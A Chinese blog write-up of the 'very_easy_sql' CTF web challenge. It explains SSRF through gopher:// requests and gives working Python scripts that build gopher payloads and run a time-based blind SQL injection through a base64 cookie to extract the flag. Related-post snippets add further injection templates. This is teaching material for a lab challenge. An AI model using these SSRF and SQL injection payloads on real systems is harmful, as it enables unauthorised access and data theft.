【攻防世界】Web very_easy_sql

最新推荐文章于 2025-07-13 23:47:10 发布
原创 最新推荐文章于 2025-07-13 23:47:10 发布 · 2.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #web安全 #安全 #系统安全

本文讲述了通过Web开发中的SSRF漏洞进行内部系统访问,并利用时间盲注技术探测登录系统的敏感信息。作者首先发现了登录过程中的Set-Cookie响应,接着利用SSRF攻破了use.php页面,最后通过时间盲注确定了注入点并成功获取了flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

做了web才发现,原来自己是真的什么都不懂啊,不过也好,说明我有很大的进步空间呢······
不闲聊了,来看题目
在这里插入图片描述
打开是一个登录界面,我们抓包看看返回些什么
在这里插入图片描述
返回包有三个需要注意的地方,我都用框框圈起来了
有一个Set-Cookie代表如果输入正确的账号跟密码是可以返回的,可以尝试爆破
第二个发现了一个新的页面use.php,我们可以访问看看
第三个,返回了一句话:

you are not an inner user, so we can not let you have identify~
翻译就是:您不是内部用户,所以我们不能让您有身份~

意思应该是我们要从内部登录吧?
我们访问一下use.php这个页面
在这里插入图片描述
看起来是一个输入url能跳转的页面,这就让我想到了ssrf攻击

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)

我们测试一下,验证一下我们得猜想
在这里插入图片描述
测试成功了,存在ssrf,会把网站显示在屏幕上方,我们写一段代码,来实现ssrf

import urllib.parse

content = "uname=admin&passwd=admin"
content_length = len(content)

test =\
"""POST /index.php HTTP/1.1
Host: 127.0.0.1:80
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

uname=admin&passwd=admin
""".format(content_length)

tmp = urllib.parse.quote(test)          # 进行URL编码     
new = tmp.replace("%0A", "%0D%0A")      # 将%0A替换为%0D%0A    把\n换行符替换为\r\n
result = urllib.parse.quote(new)        # 再次进行URL编码
print("gopher://127.0.0.1:80/_"+result) # 输出结果

构造一个POST请求,待会儿爆破一下
在这里插入图片描述
把这一串,放到burp运行一下
在这里插入图片描述
很幸运的是,好像登录上去了,这一串解码出来是admin
当你在index.php登录admin,admin的时候,是不会登录成功的,只能在use.php用ssrf去登录,因为它需要在内部登录
那就很明显了,注入点就在cookie这里,我们修改一下我们的代码,测试一下注入点
这里需要使用时间盲注

时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同,Bool 盲注是通过页面的一些变化来进行判断结果,但是有时候,执行一些 sql 语句的测试,页面不会有像布尔盲注那样直观的变化,这个时候可以在布尔盲注的基础上结合 if 判断和 sleep() 函数来得到一个时间上的延迟参照,也就可以让我们进行一些判断。也就是所谓的 “时间盲注”,又叫“延时注入”。
最主要的代码是if((查询语句),sleep(时间),1)
往下看就懂了

我们测试一下注入语句是怎么闭合的

import urllib.parse

test =\
"""GET /index.php HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:this_is_your_cookie=JykgYW5kIGlmKDE9MSxzbGVlcCg1KSwxKSM=

"""
# 测试出来注入语句是JykgYW5kIGlmKDE9MSxzbGVlcCg1KSwxKSM=,解码为:') and if(1=1,sleep(5),1)#
tmp = urllib.parse.quote(test)
new = tmp.replace("%0A", "%0D%0A")
result = urllib.parse.quote(new)
print("gopher://127.0.0.1:80/_"+result)

需要’)一个分号和一个括号来闭合前面的语句,注入语句测试出来之后,我们可以写一个时间盲注的脚本

import urllib.parse
import requests
import time
import base64

url = "http://223.112.5.156:60634/use.php?url="
flag = ""
for pos in range(1, 50):
    for i in range(32, 127):
        # 猜一下回显数量
        # poc="') union select 1,2,if(1=1,sleep(2),1)#"
        # 猜数据库名字为security
        # poc = "') union select 1,2,if(ascii(substr((database()),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"
        # 猜解数据库表名为flag
        # poc = "') union select 1,2,if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"
        # 猜解flag字段
        payload = "') union select 1,2,if(ascii(substr((select * from flag),"+str(pos)+",1))="+str(i)+",sleep(2),1) #"
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D"+payload+"%3B%250d%250a"
        start = time.time()
        requests.get(url+final_poc)
        end = time.time()
        if end-start > 2:         # 如果时间大于2秒,说明这个字符是正确的
            flag += chr(i)
            print(flag)
            break
        else:
            continue

直接运行就可以得到flag了
在这里插入图片描述

【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 1万+
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
攻防世界web - very_easy_sql 详细教程0废话
最新发布
2301_76865990的博客
07-25 417
cyberpeace{6e531ca88ee798350d2f 请注意!cookie="this_is_your_cookie= “admin'#进行base64编码复制到这” "#将UNIX 风格换行付 %OA 替换为Windows 风格的%OD%OA,确保在不同系统都能正确解析。#将UNIX 风格换行付 %OA 替换为Windows 风格的%OD%OA,确保在不同系统都能正确解析。#对已经编码过的URL再次进行URL编码。合并的地方有两个 2f 删掉其中2f就是正确的flag。
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 8072
攻防世界 -- very_easy_sql
攻防世界web新手 - very_easy_sql(非常详细的wp)
热门推荐
yuanxu8877的博客
11-27 1万+
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
very_easy_sql(SSRF+SQL注入)
2302_81650222的博客
05-07 483
you are not an inner user, so we can not let you have identify~(你不是内部用户,所以我们不能让你进行身份验证)联想到可能存在SSRF漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正是因为请求是由服务器发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),所以根据提示内容会想到SSRF漏洞。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。在\后面为'),所以闭合方式为'),
攻防世界 very_easy_sql
weixin_63640108的博客
06-12 1587
我理解的是相当于内网穿透,你获取到其中一个内网主机,可以用这个内网主机作为服务器向其他的内网机器发起攻击。报错注入模板 admin') and extractvalue(1, concat(0x7e, (select @@version),0x7e)) #4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);报错的回显最大位数为32位,此时我们只获得了32位,需要用substr函数进行分割读取。分享,通过URL地址分享网页内容,通过URL获取目标页标签等内容。
攻防世界very_easy_sql
qq_45955869的博客
05-29 883
提示:攻防世界very_easy_sql提示:死记硬背记不住的内部网络时间盲注报错建议保存。
攻防世界 - Web - Level 3 | very_easy_sql
Blue17 の 小窝
12-29 1765
再联想一下 SQL 注入,注入点这不就出来了,既然注入点在 Cookie 这里,那携带 Payload 其实也不需要了(Payload 本来就是为了去后端查表,验证用户是否是正规用户的,Cookie 也有这个作用)。下面继续深入思考一下,我们是利用目标靶场的 use.php 页面发起的请求,所以对于 use.php 而言,靶场首页的登录框,对他而言其实应该是在本地的,所以我们这里的 HOST 需要改为。利用此脚本,即可生成对应的 gopher 协议脚本,比如,我们测试用户名为。
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界misc系列解题
weixin_44215186的博客
11-16 1165
记录在CTF学习中的各种解题思路,和大家分享做题经验,同时也可以提供更好的思路,新手笔记。努力学习,大家有更好的可以留言。
攻防世界-very-easy-sql
chinese_cabbage0的博客
02-28 2907
攻防世界的这个题目的详细解析,没有比这个更加全面,更加通俗易懂的了,大家可以参考一下,学生到很多东西
攻防世界--very_easy_sql
08-26 6600
页面显示"you are not an inner user, so we can not let you have identify~",就是说只能内部访问登录。这里抓包还看到返回包里有个set-cookie。注入点在cookie,通过使用时间盲注payload然后再base64转码,编写盲注脚本。构造ssrf语句实现从内部访问。...
Web安全攻防世界08 very_easy_sql
weixin_42789937的博客
12-25 4437
Web安全攻防世界08 very_easy_sql,我也有点稀里糊涂,经过了多次失败,终于水了一篇混杂了30%的博文链接+60%的错误解法+文末10%官网wp的博文~
【愚公系列】2023年05月 攻防世界-Webvery_easy_sql
时光隧道
05-27 8053
SSRF(Server Side Request Forgery)是一种安全漏洞,攻击者可以利用该漏洞远程发送请求,使得目标服务器处理攻击者指定的请求,而不是合法的请求。攻击者可以利用此漏洞,访问受保护的资源,或者从外部网络中执行任意命令。Gopher协议是一种用于访问互联网资源的协议,通过gopher协议可以访问各种不同类型的协议,包括http、ftp、SMTP等。攻击者可以利用gopher协议来构造恶意请求,从而利用SSRF漏洞攻击目标系统。
2.攻防世界 very_easy_sql
2401_86760082的博客
02-13 1299
例如,一个应用程序需要从用户输入的 URL 中读取数据,攻击者可以将这个 URL 指向内部网络地址或其他受保护的资源。由于服务器通常具有更高的权限和更广泛的网络访问权限,因此可以绕过网络访问控制,访问内部系统或其他受保护的资源。文件上传功能:当应用程序对上传的文件进行处理,如解析文件中的 URL 并发起请求时。可以对内部网络的其他服务发起攻击,例如对内部的 Redis 服务发送恶意命令,进行数据篡改或信息窃取。绕过网络防火墙,因为请求是从内部服务器发起的,而不是外部攻击者直接发起。
[攻防世界]very_easy_sql
GKDf1sh
01-24 1099
# [攻防世界]very_easy_sql 参考链接:https://blog.csdn.net/yuanxu8877/article/details/128069145 ### 0x00 前置知识 - ssrf + gopher协议 - sql注入(报错注入or时间盲注) - python脚本编写 ssrf可以利用协议作为探针访问内网,如http,file,dict,ftp,gopher等 ## gopher协议和ssrf联合使用 > gopher协议是一种信息查找系统,他将Inter
very_easy_sql-攻防世界
szhangliwenya的博客
04-02 572
(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)重新构造一个gopher的payload,带上这个cookie的内容再去访问use页面:由于不回显,所以选择时间盲注,用admin') and if(1,sleep(5),1)#进行测试,或者') and if(1,sleep(5),1)#都可。官方wp里写使用admin,admin弱密码账号,还说登录框是用来校验这个用户名和密码是否再数据库中存在的,所以还是没告诉是弱密码。构造ssrf语句实现从内部访问。
攻防世界——Webvery_easy_sql
2401_88083440的博客
07-13 885
看到了题目是sql就猜测是sql注入和万能密码了,但怎么试貌似都没有反应,看源代码发现了use.php访问use.php页面可以猜测这里是SSRF,可以访问到我们本不能访问的界面,比如:服务器本地的127.0.0.1:3306先尝试127.0.0.1发现成功包含了index.php页面,此页面端口号为80端口,而我们要用到的就是这个端口,还记得一开始的页面:应该是借助这里的SSRF,才有正常的身份验证权,现在就是想如何借助SSRF向服务器构造请求,让服务器正常执行我们的身份验证权。
130,[1] 攻防世界 very_easy_sql
2402_87039650的博客
02-12 1148
本题名为sql,不过尝试sql的时候没显示什么,url处传输本地地址时都没想到ssrf。提示的cookie解码后是admin,开始利用sql注入,就以cookie为注入点。明白第一个页面是通过post方式提交,反正没得到什么信息,去抓包。或许set cookie的部分就是给出信息,不过我们传输的内容不对。提交的内容不在url处显示,反而第二个url页面会在url处显示。同样的改cookie在第一个页面也尝试了,同样没什么结果。还尝试了其他都是nonono。爆出了错误,开始报错注入。用到了gopher协议。
攻防世界Web_php_include
12-27
### 关于Web安全中PHP `include`相关的攻击与防御 #### PHP Include 攻击原理 当应用程序使用用户提供的输入直接包含文件时,可能会发生文件包含漏洞。如果未对用户提交的数据进行适当验证,则可能导致远程文件包含(RFI)或本地文件包含(LFI)[^2]。 #### 防御措施 ##### 输入验证 确保所有来自用户的输入都经过严格过滤和消毒处理。不允许任何不受信任的数据作为文件路径的一部分传递给`include`语句。可以采用白名单机制来限定允许访问的具体文件列表: ```php $allowed_files = ['file1.php', 'file2.php']; $file_to_include = $_GET['page']; if(in_array($file_to_include, $allowed_files)){ include $file_to_include; }else{ echo "Invalid file requested."; } ``` ##### 文件扩展名检查 强制规定只允许特定类型的文件被包含进来,并且最好是在服务器端设置默认的`.php`扩展名以避免绕过防护逻辑的情况出现: ```php // 只允许 .php 扩展名的文件 if(pathinfo($filename, PATHINFO_EXTENSION) !== 'php'){ die('Invalid extension'); } include "$filename.php"; ``` ##### 禁止URL传参方式调用 尽可能地避免通过HTTP请求参数指定要加载的内容;而是考虑使用固定名称或者枚举值映射到内部资源上。这样即使存在潜在风险也能有效遏制住外部干扰源的影响范围。 ##### 使用绝对路径而非相对路径 始终使用完整的、基于根目录下的绝对路径而不是当前工作目录内的相对位置去引用待引入的目标文档。这有助于减少因环境变量配置不当而引发的安全隐患。 ```php define('__ROOT__', dirname(__FILE__)); include __ROOT__."/path/to/file.php"; // 绝对路径更安全 ``` ##### 开启open_basedir限制 在PHP.ini配置文件里启用此选项可进一步约束脚本所能触及的最大边界之外的一切尝试都将失败返回错误提示信息。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值